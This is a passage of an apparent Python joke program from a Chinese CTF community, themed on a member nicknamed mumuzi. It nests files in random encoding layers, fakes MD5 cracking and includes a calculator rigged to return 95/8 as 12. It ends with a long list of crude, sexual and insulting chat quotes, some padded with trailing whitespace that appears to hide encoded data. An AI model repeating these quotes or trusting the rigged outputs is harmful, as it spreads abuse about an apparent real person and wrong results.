			output_file_type=random.choice(['zip','txt','reverse','png','xor'])
			#output_file_type='txt'
			output_file=input_file.split('.')[0]+'.tao'+str(mumuzi.tao_layer)
			file_size=get_file_size(input_file)
			if file_size<1024*1024:
				#文件大于1m，不适合png的method2、txt的method1和3 和xor
				mask=0
			elif file_size>5*1024*1024:
				#文件大于5m，不适合txt 和xor
				mask=2
			else:
				mask=1

			if output_file_type=='txt' and mask<2:
				enc_to_txt_file(input_file,output_file,random.randint(1+mask,3-mask))
			elif output_file_type=='zip':
				enc_to_zip_file(input_file,output_file,random.randint(1,2))
			elif output_file_type=='png':
				enc_to_png_file(input_file,output_file,random.randint(1,int(2-mask/2)))
			elif output_file_type=='xor' and mask==0:
				enc_xor_file(input_file,output_file)
			else:
				enc_reverse_file(input_file,output_file)

			input_file=output_file
		
		return(output_file)
	
	def kou(self):
		'口算md5'
		md5_dict={}
		for i in range(3):
			x=random.randint(0,1)
			m=''.join(random.sample('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',k=12))
			if x:
				md5_dict[hashlib.md5(m.encode()).hexdigest()]=m
			else:
				md5_dict[hashlib.md5(m.encode()).hexdigest()[8:-8]]=m
		print('mumuzi:\n\t你想要计算哪个哈希？')
		i=1
		k={}
		for key in md5_dict:
			print(i,key)
			k[str(i)]=key
			i=i+1
		a=input(':')
		if a not in ['1','2','3']:
			self.kua()
		else:
			x=random.randint(1,10)
			if x<8:
				print('口算完了，这是'+str(len(k[a]))+'位md5，明文是:'+md5_dict[k[a]])
			else:
				self.kua()

	def bi(self):
		'笔算比特币'
		x=random.randint(1,10)
		if x >5:
			print('mumuzi:\n\t不想算')
			self.kua()
		else:
			pattern = re.compile(b'"pageProps":{"coin":"BTC","network":"mainnet","page":1,"pageSize":5,"block":{')
			print('mumuzi:\n\t好吧，那我就算一个吧')
			print('.................')
			print('少女笔算中....')
			try:
				url='https://btc.tokenview.com/api/blocks/btc/1/10'
				headers={
 				   'User-Agent':'Mozilla/5.0 (compatible; MSIE 5.5; Windows NT)'
				}
				req = request.Request(url=url,headers=headers,method='GET')#req.add_header('User-Agent','Mozilla/5.0 (compatible; MSIE 8.4; Windows NT') #也可以request的方法来添加
				response = request.urlopen(req,timeout=3) 
				bj=json.loads(response.read().decode('utf-8'))
				newest_block=bj['data'][0]
				detail_url='https://www.blockchain.com/btc/block/'+str(newest_block['block_no'])
				req= request.Request(url=detail_url,headers=headers,method='GET')#req.add_header('User-Agent','Mozilla/5.0 (compatible; MSIE 8.4; Windows NT') #也可以request的方法来添加
				response = request.urlopen(req).read()
				l=pattern.search(response).span()[1]
				s=response[int(l):int(l)+300]
				li=s.decode().split(',')
				print('.................')
				print('mumuzi:\n\t笔算完了，区块信息:')
				for i in range(len(li[:-1])):
					print('\t'+li[i].replace('"',''))
			except:
				print('mumuzi:\n\t你的网络太差了，套神不想算\nmumuzi:\n\t套神不用互联网，套神都用脑电波发包\nmumuzi:\n\t学学套神')



	def shou(self):
		'手撸代码'
		x=random.randint(1,10)
		if x >5:
			print('mumuzi:\n\t不想手了')
			self.kua()
			return
		numberset=set('0123456789.')
		n1=input('mumuzi:\n\t行吧，我很忙，只够撸一个四则运算，你要我算啥？\n\t你先给我一个数\n一般群友:\n\t')
		if not set(n1).issubset(numberset) or n1 =='' or n1.count('.')>1:
			print('mumuzi:\n\t笑死\nmumuzi:\n\t数字都不会打\nmumuzi:\n\t回去读小学吧')
			return
		if '.' in n1:
			n1=float(n1)
		else:
			n1=int(n1)
		operation=input('mumuzi:\n\t你想怎么算？+,-,*,/随便选\n一般群友:\n\t')
		if operation not in ['+','-','*','/']:
			print('mumuzi:\n\t逗我呢，不算了！')
			return
		n2=input('mumuzi:\n\t再给我一个数\n一般群友:\n\t')
		if not set(n2).issubset(numberset) or n2=='' or n2.count('.')>1:
			print('mumuzi:\n\t我说的是数字，不算了！')
			return
		if '.' in n2:
			n2=float(n2)
		else:
			n2=int(n2)
		if n1==95 and operation=='/' and n2==8:
			result=12
		elif operation=='/' and int(n2)==0:
			print('mumuzi:\n\t除以0咋算！')
			return
		else:
			if operation=='+':
				result=n1+n2
			elif operation=='-':
				result=n1-n2
			elif operation=='*':
				result=n1*n2
			elif operation=='/':
				result=n1/n2
		expr=str(n1)+operation+str(n2)
		print('.................')
		print('少女计算中.',end='')
		waiting(cycle=20,delay=0.2)
		print('.................')
		if operation=='/':
			if '.' in str(result):
				if int(str(result).split('.')[1])>0:
					print('mumuzi:\n\t撸完了，差点撸下来了。'+expr+'答案是：'+str(result))
				else:
					print('mumuzi:\n\t撸完了，差点撸下来了。'+expr+'是整除，答案是：'+str(result).split('.')[0])
			else:
				print('mumuzi:\n\t撸完了，差点撸下来了。'+expr+'是整除，答案是：'+str(result))
		else :
			print('mumuzi:\n\t撸完了，差点撸下来了。'+expr+'答案是：'+str(result))
	

	def ban(self):
		'3行代码，ban了套神'
		print('mumuzi:\n\t呜呜呜\nmumuzi:\n\t我大号\nmumuzi:\n\t冻了\n')
		exit(1)
	

	
	def kua(self):
		'套神夸人'
		print('='*100)
		print(random.choice(taoshenyulu[:22]))
		mumuzi.talk_count=mumuzi.talk_count+1

	def solve(self,filename):
		'套神解套'
		print('='*100)
		if mumuzi.tao_layer>mumuzi.talk_count:
				print('mumuzi:\n\t麻了\nmumuzi:\n\t还要冲一次\nmumuzi:\n\t腿已经软了')
				return
		mumuzi.tao_layer+=1
		with open(filename,'rb')as f: 
			layer_data_b=f.read()
		re_result=re.match(layer_pattern,layer_data_b)
		if re_result:
			current_layer=int(re_result.group(0).decode().split('_')[3])
			ftype=filetype(layer_data_b[len(re_result.group(0)):])
			print('当前套娃层数:'+str(current_layer))
			if current_layer <=1:
				print(random.choice(['mumuzi:\n\t累了，不搞了。','mumuzi:\n\t你自己搞吧。','mumuzi:\n\t不想做了。']))
				exit(0)
		else:
			print('mumuzi:\n\t不要拿奇怪的东西来糊弄套神好么')
			self.kua()
		if 'xor' in ftype:
			print('套神根据积累和特征看出来是xor加密，密钥是'+ftype[-1])
			result=decode_xor(filename,ftype[-1],current_layer)
		elif ftype in ['hex','base64','base85']:
			print('套神根据积累和特征看出来这是文本加密，加密方法是'+ftype)
			result=decode_txt(filename,ftype,current_layer)
		elif ftype=='reverse':
			print('件文序反个一是这来出看征特和累积据根神套')
			result=decode_file(filename,ftype,current_layer)
		elif ftype=='unknown':
			print(random.choice(['mumuzi:\n\t累了，不搞了。','mumuzi:\n\t你自己搞吧。','mumuzi:\n\t不想做了。']))
			exit(0)
		else:
			print('套神根据积累和特征看出来这是一个'+ftype+'文件')
			result=decode_file(filename,ftype,current_layer)
		if result is None:
			print(random.choice(['mumuzi:\n\t累了，不搞了。','mumuzi:\n\t你自己搞吧。','mumuzi:\n\t不想做了。']))
			exit(0)
		else:
			print('套神帮你解好套了，快感谢套神')
			return(result)

	def hhh(self,filename):
		import os
		print("__file__ = %s" % __file__)
		#获取文件的全路径
		print("os.getcwd() = %s" % os.getcwd())
		#获取当前目录路径(和linux的pwd一样)
		print("os.path.realpath(__file__) = %s " % os.path.realpath(__file__))
		#获取文件的全路径加文件名
		print("os.path.abspath(__file__) = %s " % os.path.abspath(__file__))
		#获取文件的绝对路径加文件名
		print("os.path.dirname(os.path.realpath(__file__)) = %s " % os.path.dirname(os.path.realpath(__file__)))
		#获取文件路径
		print("os.path.basename(os.path.realpath(__file__)) = %s " % os.path.basename(os.path.realpath(__file__)))
		#获取文件名
		print("os.path.split(os.path.realpath(__file__))[0] = %s " % os.path.split(os.path.realpath(__file__))[0])
		#获取文件路径
		print("os.path.split(os.path.realpath(__file__))[1] = %s " % os.path.split(os.path.realpath(__file__))[1])	

	def bbb(self,module_name):
		d=importlib.import_module('mumuzi.'+module_name.replace('\\','.').replace('/','.'))
		info=d.info()
		print(info)


import queue
import threading
import typing

printer_queue = queue.Queue()


class PrintResource(typing.NamedTuple):
    content: tuple
    sep: str
    end: str
    file: typing.IO


class PrinterThread(threading.Thread):
    def __init__(self):
        super(PrinterThread, self).__init__()
        self.daemon = True

    def run(self):
        while True:
            resource = PrintResource(*printer_queue.get())
            print(
                *resource.content,
                sep=resource.sep,
                end=resource.end,
                file=resource.file,
            )
            printer_queue.task_done()

    @staticmethod
    def wait():
        printer_queue.join()

    def put(self, resource: PrintResource):
        printer_queue.put(resource)



taoshenyulu=["mumuzi:\n\t你阳寿没了",   			 	   
"mumuzi:\n\t你阳寿阴寿都没了",	
"mumuzi:\n\t你要求真多",     	 		 	 	
"mumuzi:\n\t爬",	
"mumuzi:\n\t废物",     	  		 		
"mumuzi:\n\t死的安详一点嗷",	
"mumuzi:\n\t烦死了",     			  	 	
"mumuzi:\n\t叫你滚你都不滚",	
"mumuzi:\n\t恶不恶心",     	   		 	
"mumuzi:\n\ttm给你来一刀",	
"mumuzi:\n\t别想嫖我",     	  		 	 
"mumuzi:\n\t操",	
"mumuzi:\n\t你是不是不听话",     		 		 	
"mumuzi:\n\t滚",	
"mumuzi:\n\t射射老板",     			 	 	
"mumuzi:\n\t笑死",	
"mumuzi:\n\t就要这样",     		 		 	
"mumuzi:\n\t进去了\nmumuzi:\n\t但没有完全进去",	
"mumuzi:\n\t是想告诉大家不要不识抬举",     			 	 	
"mumuzi:\n\t那是你菜",	
"mumuzi:\n\t套起来",     				 	 
"mumuzi:\n\t一般",	
"mumuzi:\n\t来劲服务\nmumuzi:\n\t好",     		 	  	
"mumuzi:\n\t哈哈,大家聊了这么多啊,刚刚在厕所奖励了自己12个小时晕过去了,现在刚醒,看到群里发的涩图又得奖励自己了",	
"mumuzi:\n\t带我\nmumuzi:\n\t我是妹妹",     			  	  
"mumuzi:\n\t我能怎么办嘛\nmumuzi:\n\t我总不能让大家一个个都去拜访出题人然后锤爆狗头",	
"mumuzi:\n\t实操　比　理论　有用",     	 				  
"mumuzi:\n\t撸出来的",	
"mumuzi:\n\t也想玩女朋友",     	  		 	 
"mumuzi:\n\t要满了",	
"mumuzi:\n\t我躺好了你来吧\nmumuzi:\n\torz\nmumuzi:\n\t我就是很敏感的一个小女生\n\t\t\t呜呜",     			  		 
"mumuzi:\n\t干到我了",	
"mumuzi:\n\t就是你上了pornhub",     	 	   	 
"mumuzi:\n\t明天早点醒然后一把把手里屯的flag交上去,直接傍一震惊全场",	
"mumuzi:\n\t戴套干嘛",     	 	  		 
"mumuzi:\n\t麻了\nmumuzi:\n\t还要冲一次\nmumuzi\n\t腿已经软了",	
"mumuzi:\n\t我这里　刚好有一个flag　我还不想交\nmumuzi:\n\t送你们交\nmumuzi:\n\t我flag还蛮多的　要是你们不介意的话　你们可以来我家要flag",     			  	 	
"mumuzi:\n\t好热哦",	
"mumuzi:\n\t带什么带都滚去自己学去",     	   	   
"mumuzi:\n\t你在哪",	
"mumuzi:\n\t但是神会",     	 		    
"mumuzi:\n\t8人！\nmumuzi:\n\t击剑！",	
"mumuzi:\n\t你猜八神这句话是不是我安排的",     			  			
"mumuzi:\n\t我是傻逼",	
"mumuzi:\n\t榜一白上了",     	  	 	  
"mumuzi:\n\t狗群主狗管理,出来挨打！",	
"mumuzi:\n\t姐姐我要捏奶",     	 		 	 	
"mumuzi:\n\t你买我就女装\nmumuzi:\n\t少说我也是穿过的",	
"mumuzi:\n\t等看了wp你就知道了\nmumuzi\n\t反正我写完了",     			  	 	
"mumuzi:\n\t肾透可以",	
"mumuzi:\n\t要女师傅贴贴",     	 	 		 	
"mumuzi:\n\t你进去啊",	
"mumuzi:\n\t搞就完了",     	  	    
"mumuzi:\n\t我刚刚都进了",	
"mumuzi:\n\t哦\nmumuzi:\n\t膨胀了\nmumuzi:\n\t已经开始",     			  	 	
"mumuzi:\n\t做着方便",	
"mumuzi:\n\t明白了,我套神要全部交完",     	 	  	 	
"mumuzi:\n\t那么久了\nmumuzi:\n\t才操完？",	
"mumuzi:\n\t全是fw",     	  	 			
"mumuzi:\n\t不仅面基,击剑都可以",	
"mumuzi:\n\t套神快爬啊",     			  			
"mumuzi:\n\t以我现在的实力,一个小时应该能吧",	
"mumuzi:\n\t都是软的",     	 	  	 	
"mumuzi:\n\t我想嫖",	
"mumuzi:\n\t不要射别人啊",     	  				 
"mumuzi:\n\t饭可以乱吃,话不可以乱说哦【刀】",	
"mumuzi:\n\t你是故意找茬是不是",     			  	  
"mumuzi:\n\t累啊【叹气】\nmumuzi:\n\t刚刚才冲了一次【叹气】",	
"mumuzi:\n\t老公操我",     	 			  	
"mumuzi:\n\t自己捅一刀不好吗",	
"mumuzi:\n\t屯了两个月的flag",     	   	   
"mumuzi:\n\t我不套娃\nmumuzi:\n\t我不配套娃",	
"mumuzi:\n\t有点少哦",  
"mumuzi:\n\t出了\nmumuzi:\n\t差撸下来了",
"mumuzi:\n\t还是100\nmumuzi:\n\t之前也是100　弄了3次而已",
"mumuzi:\n\t呃,嗯嗯,啊啊啊啊啊啊啊啊啊啊啊啊啊啊",
"mumuzi:\n\t大佬来了",
"一般群友:\n\t这个二维码怎么识别啊\nmumuzi:\n\t肉眼",
"mumuzi:\n\t没擦干净",
"mumuzi:\n\t我好寂寞啊",
"mumuzi:\n\t我不要钱",
"mumuzi:\n\t这是为了用的更方便",
"mumuzi:\n\t@需要迅雷会员联系我无偿借　你群名笑死了\n需要迅雷会员联系我无偿借:\n\t笑nm",
"mumuzi:\n\t老板断气\nmumuzi:\n\t老板身体欠刚",
"mumuzi:\n\t我觉得我就肾虚",
"mumuzi:\n\t叔叔我呀,最喜欢了",
"mumuzi:\n\t只要协商好了　499个人一起都可以",
"mumuzi:\n\t自己买女装出去过过瘾\nmumuzi:\n\t然后卖出去\nmumuzi:\n\t还赚",
"一般群友:\n\t就是那个。两个圆圆的\n一般群友:\n\t一根长长的,向上的\nmumuzi:\n\t当时晚上那个是你？",
"mumuzi:\n\t挺好的\nmumuzi:\n\t他让我【马赛克】性开放了300%\nmumuzi:\n\t爱死了\nmumuzi:\n\t【狗头】\nmumuzi:\n\t不知道怎么说\nmumuzi:\n\t反正\nmumuzi:\n\t牛逼",
"mumuzi:\n\t三等功竟是我自己\nmumuzi:\n\t【马桶感叹号】",
"mumuzi:\n\tmumuzi:三等功到手了",
"mumuzi:\n\t[一般群友　17:33　　　　　　⬆]\n\t我这么拍套神马屁套神都不理我\n\t@一般群友　?\nmumuzi:\n\ttm说话文明点",
"mumuzi:\n\t我肾虚我牛逼",
"mumuzi:\n\t我取证都是上门要flag的",
"mumuzi:\n\t会打CTF,会挖洞,长得帅,还有女朋友",
"mumuzi:\n\t我DNA动了",
"一般群友:\n\t@mumuzi　今夜你是我的,谁也别想抢【可爱】【可爱】【可爱】\nmumuzi:\n\t好",
"mumuzi:\n\t能让你做出来就不错了",
"mumuzi:\n\t明白了,我【马赛克】神要全部交完",
"mumuzi:\n\t确实\nmumuzi:\n\t尤其是套套子",
"mumuzi:\n\t手都累死了",
"mumuzi:\n\t你做爱",
"mumuzi:\n\t我把wp发你　你去ak　ctfshow吧　orz　orz　orz",
"mumuzi:\n\t现在越来越奇怪了",
"一般群友:\n\t鸡巴毛都看不见\n一般群友:\n\t到底有多大\nmumuzi:\n\t我7cm",
"mumuzi:\n\t透我",
"mumuzi:\n\t直接就能插的",
"mumuzi:\n\t出不来题就不要出。",
"mumuzi:\n\t那我不当人了",
"mumuzi:\n\tPC还真不怎么用",
"mumuzi:\n\t拿到这种我一般直接冲",
"mumuzi:\n\t套神用食指和F5把平台DDOS了",
"mumuzi:\n\t那我真大吗？"
]